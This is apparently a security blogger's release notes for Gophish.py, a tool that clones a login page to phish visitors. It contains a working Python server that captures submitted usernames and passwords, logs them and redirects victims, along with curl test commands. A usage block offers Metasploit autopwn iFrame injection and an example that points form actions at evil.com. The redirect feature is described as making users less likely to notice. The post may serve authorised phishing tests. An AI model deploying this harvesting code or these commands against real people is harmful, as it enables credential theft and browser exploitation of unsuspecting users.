CodeWatch

I’ve released a new version of Gophish.py. The update includes:

  • Added comments explaining my ugly code.
  • Cleaned up some code with a function, removing some redundancy.
  • Some bug fixes. The main fix is for an issue I found in certain cases when running it on Linux. Sometimes BeautifulSoup would change the order of the HTML page, moving functions in a script tag to a whole separate portion of the page (outside of the script tags), for instance. This would totally bork the page. Now I am using the lxml support in BeautifulSoup, which seems to have remediated the issue and works on Windows or Linux. Unfortunately, installing lxml on Windows is a little more of a pain than on Linux (no `easy_install lxml`). The best way to do this is to install an lxml binary from one of the exe’s found here.
  • Gophish now ignores robots.txt. Stupid mistake on my part: I didn’t realize Mechanize automatically honored robots.txt files, so it would refuse to fetch pages that the target had disallowed for crawlers.
  • Added some additional logging on the initial connection and subsequent page accesses.
  • Added an option to specify the IP to listen on, rather than just 0.0.0.0 (this is still the default).
  • Added an option to specify a clickthrough landing page. With this option, the URL you provide is what the phished target is redirected to when they submit a form. In the past, Gophish always just submitted the form values to the phished site using the path found in the original form ACTION. Note that submitted information still gets logged either way.
  • Added an option to redirect users in the case where you want to replicate the target’s own redirection behaviour. For example, if your target redirects mail.example.com to outlook.example.com/blah/page/file.ext, then you can now do this with Gophish on your phish page. This way, your phishing page reacts in the same way as the target, reducing the likelihood that someone will notice.

Lots of new stuff, all things considered. Let’s start with the easy features that have been added. If you pass --listen <IP>, then Gophish will listen on that IP rather than 0.0.0.0. The default is still 0.0.0.0, and this is what is used if this option is not specified. Keep in mind that 0.0.0.0 binds to every interface on the box, so on a multi-homed host you will usually want to pin the listener to the one address you actually intend to expose.

The next option is pretty simple as well. If you pass --landing <http://www.landingsite.com>, then this is where the phished target will be redirected after submitting any forms on the phishing page. The default is to log submitted form values and then submit them to the REAL site, resulting in the user being redirected and possibly logged in to the real site. However, there are some cases where this isn’t what you want. Sometimes it’s nice to capture credentials (or whatever else you are trying to get from the form) and then have the user land on another page. This page might capture more information, and acts as a “clickthrough” page.

The final option is meant for mimicking specific behaviour of the target page as closely as possible. Many times, users access a page just by its familiar name like mail.example.com and are then redirected to something like server-1-mail.example.com. Most users won’t even notice this behaviour, but I added a feature just in case. You can now pass --redirect <content in FQDN to regex for redirect> along with --redirectto <full URL to redirect to> to perform the redirection. The first value is used as a regular expression against the requested host name; if it matches, the user is redirected to the full URL given by the second option. Two things to watch: a dot in the first value is a regex metacharacter (so `mail.example.com` also matches `mailXexample.com`, which is harmless here but worth knowing), and --redirectto expects a full URL including http(s):// even though the usage text below shows a bare default of www.google.com, so always pass it explicitly.
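To make the --redirect/--redirectto and --landing behaviour concrete, here is an added example in the spirit of those options. It is illustration code written for this page, not Gophish.py’s own implementation; the function names, the JSON log format and the option variables at the top are assumptions. It matches the --redirect value against the incoming Host header (case-insensitively, with or without a port), answers with a 302 to --redirectto on a match, and on a form POST logs the submitted fields and then sends the client to the landing page. One simplification, marked in the code: when no landing page is set it redirects the client to the original form action instead of relaying the values server-side the way Gophish does.

```python
"""Added example (not Gophish.py's code): host-regex redirect and
landing-page redirect after capturing a submitted form."""
import json
import re
import urllib.parse
from datetime import datetime, timezone
from http.server import BaseHTTPRequestHandler, HTTPServer

# Assumed option values, equivalent to:
#   --redirect mail.example.com --redirectto http://mail1.example.com/owa/exch/
#   --landing http://www.landing.com --logfile phishlog.txt
REDIRECT_PATTERN = "mail.example.com"
REDIRECT_TO = "http://mail1.example.com/owa/exch/"
LANDING = "http://www.landing.com"
LOGFILE = "phishlog.txt"
ORIGINAL_ACTION = "https://www.victim.com/login.php"  # assumed form ACTION


def compile_redirect(pattern, literal=False):
    """Compile the --redirect value. literal=True escapes it so that the
    dots in a hostname match only dots; the default keeps it a raw regex
    as the option description implies."""
    if literal:
        pattern = re.escape(pattern)
    return re.compile(pattern, re.IGNORECASE)


def redirect_target(host_header, compiled, redirect_to):
    """Return the URL to 302 to if the Host header matches, else None.
    The port is stripped so 'mail.example.com:8080' still matches."""
    host = (host_header or "").split(":", 1)[0]
    return redirect_to if compiled.search(host) else None


def parse_form(body):
    """Decode an application/x-www-form-urlencoded body into a dict."""
    text = body.decode("utf-8", errors="replace")
    return dict(urllib.parse.parse_qsl(text, keep_blank_values=True))


def after_submit(landing, original_action):
    """Where the client goes after a capture: --landing if set, otherwise
    the original action (simplification of Gophish's server-side relay)."""
    return landing if landing else original_action


def log_line(client, path, fields):
    """One JSON line per capture; timestamps are UTC."""
    return json.dumps({
        "ts": datetime.now(timezone.utc).isoformat(),
        "client": client,
        "path": path,
        "fields": fields,
    })


class PhishHandler(BaseHTTPRequestHandler):
    redirect_re = compile_redirect(REDIRECT_PATTERN)

    def _redirect(self, url):
        self.send_response(302)
        self.send_header("Location", url)
        self.end_headers()

    def do_GET(self):
        target = redirect_target(self.headers.get("Host"), self.redirect_re, REDIRECT_TO)
        if target:
            self._redirect(target)
            return
        # A real tool would serve the rewritten phish page here.
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.end_headers()
        self.wfile.write(b"<form method='post'><input name='user'><input name='pass'></form>")

    def do_POST(self):
        length = int(self.headers.get("Content-Length", "0"))
        fields = parse_form(self.rfile.read(length))
        with open(LOGFILE, "a", encoding="utf-8") as fh:
            fh.write(log_line(self.client_address[0], self.path, fields) + "\n")
        self._redirect(after_submit(LANDING, ORIGINAL_ACTION))


if __name__ == "__main__":
    # Equivalent of --listen 127.0.0.1 --port 8080 (assumed values).
    HTTPServer(("127.0.0.1", 8080), PhishHandler).serve_forever()
```

Run it, then `curl -i -H 'Host: mail.example.com' http://127.0.0.1:8080/` to see the 302 to the --redirectto URL, and `curl -i -d 'user=bob&pass=x' http://127.0.0.1:8080/login` to see the capture appended to phishlog.txt and the 302 to the landing page.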

If you are new to Gophish, you can find additional information here, here, and here. Usage information for the script:

  usage: gophish.py [-h] --phish PHISH --replace REPLACE [--logfile LOGFILE]
                  [--listen LISTEN] [--port PORT] [--ssl]
                  [--sslchain SSLCHAIN] [--sslcert SSLCERT] [--sslkey SSLKEY]
                  [--autopwn AUTOPWN] [--autofill AUTOFILL]
                  [--redirect REDIRECT] [--redirectto REDIRECTTO]
                  [--landing LANDING]

  Automatically setup a phishing site.

  optional arguments:
    -h, --help            show this help message and exit
    --phish PHISH         the full URL to phish back to the victim (must 
                          include http(s)://) (default: None)
    --replace REPLACE     the IP/FQDN to replace FORM actions with (must 
                          include http(s):// and final /) (default: None)
    --logfile LOGFILE     log file to store submitted form values (default:
                          phishlog.txt)
    --listen LISTEN       the IP to bind to (default: 0.0.0.0)
    --port PORT           the port to start the listening web server on
                          (default: 80)
    --ssl                 enable SSL on the running port (default: 0)
    --sslchain SSLCHAIN   certificate chain file to use when ssl option is
                          enabled (default: chain.crt)
    --sslcert SSLCERT     certificate file to use when ssl option is
                          enabled (default: ssl.crt)
    --sslkey SSLKEY       private key file to use when ssl option is
                          enabled (default: ssl.key)
    --autopwn AUTOPWN     Metasploit auxiliary/server/browser_autopwn URL to
                          inject as an iFrame (default: None)
    --autofill AUTOFILL   file to use to autosubmit autocomplete fields
                          (default: None)
    --redirect REDIRECT   redirect requests for this address somewhere else
                          (default: None)
    --redirectto REDIRECTTO
                          redirect requests in the redirect option to this
                          address (full link, must include http(s)://) 
                          (default: www.google.com)
    --landing LANDING     redirect to this landing page instead of original site
                          after form is submitted (include full link) 
                          (default: None)

  Example: gophish.py --phish https://www.victim.com/login.php --replace \
    https://www.evil.com/ --listen 1.1.1.1 --landing http://www.landing.com \
    --redirect mail.example.com --redirectto http://mail1.example.com/owa/exch/

I’ve left the original download location up, but will eventually remove this and only use the new location, which is here. That is where you can get the latest and greatest version.

Enjoy!
